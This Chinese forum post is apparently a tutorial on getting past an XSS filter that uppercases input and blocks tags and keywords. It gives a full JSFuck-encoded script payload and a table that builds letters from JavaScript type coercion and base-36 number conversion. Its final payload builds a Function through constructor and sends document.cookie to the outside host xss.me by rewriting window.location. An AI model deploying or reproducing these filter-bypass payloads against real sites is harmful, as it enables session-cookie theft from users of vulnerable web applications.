0x00 Question
某次遇到的XSS,它将所输入的所有字母均使用PHP转换为大写,并且过滤了入src等关键字以及各种标签。
0x01 Some Links
http://holyvier.blogspot.jp/2011 ... part-2-strings.html
http://holyvier.blogspot.jp/2011 ... getting-window.html
http://holyvier.blogspot.jp/2015 ... lenge-writeups.html
0x02 JSFuck bypass Uppercase
如果输入没有对输入长度进行限制,即可使用JsFuck编码进行绕过
如:
[JavaScript] 纯文本查看 复制代码 <script>alert(1)</script>
通过JSFUCK编码后为:
[JavaScript] 纯文本查看 复制代码 <script>[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()<script>
0x03 字符串拼接绕过Uppercase
js在执行一些运算的时候,可能会出现一些类似于NaN之类的字符并保存在变量中,如:
http://idoge.cc/img/xss_bypass_Uppercase/xss_bypass_Uppercase_1.png
那么通过这样我们可以得到自己想要的字符串并拼凑起来执行到自己想要的命令,如:
http://idoge.cc/img/xss_bypass_Uppercase/xss_bypass_Uppercase_2.png
下面是字母和符号的对照表:
a (!1+"")[1]
b (1+{})[3]
c (1+{})[6]
d ([][[]]+"")[2]
e ([][[]]+"")[3]
f ([][[]]+"")[4]
i ([][[]]+"")[5]
j (1+{})[4]
l (!1+"")[2]
m* (1..constructor+"")[11]
n ([][[]]+"")[1]
o (1+{})[2]
r (!0+"")[1]
s (!1+"")[3]
t (!0+"")[0]
u ([][[]]+"")[0]
v* ([].sort+"")[23]
y (1/0+"")[7]
该方式利用可通过constructor和toString这两个函数.
通过constructor形成一个空的构造函数可以执行任意代码
http://idoge.cc/img/xss_bypass_Uppercase/xss_bypass_Uppercase_3.png
toString可以通过进制转换拼接得到任意字符,如十进制转换为三十六进制:
17795081 -> alert
1966241552 -> windows
1698633989591 -> location
1071753937337 -> document
767051222 -> cookie
如此拼接可得到想要的payload,如:
http://idoge.cc/img/xss_bypass_Uppercase/xss_bypass_Uppercase_4.png
完整利用为:
[JavaScript] 纯文本查看 复制代码 $=(1+{})[6]+(1+{})[2]+([][[]]+"")[1]+(!1+"")[3]+(!0+"")[0]+(!0+"")[1]+([][[]]+"")[0]+(1+{})[6]+(!0+"")[0]+(1+{})[2]+(!0+"")[1];
$$=[][$][$];
_=(!0+"")[0]+(1+{})[2]+"S"+(!0+"")[0]+(!0+"")[1]+([][[]]+"")[5]+([][[]]+"")[1]+(""[$]+"")[14];
$$(1966241552[_](36)+"."+1698633989591[_](36)+"="http://xss.me/"+"+1071753937337[_](36)+"."+767051222[_](36))();
以上,感谢VV大哥的帮助,欢迎各位师傅们指正。 |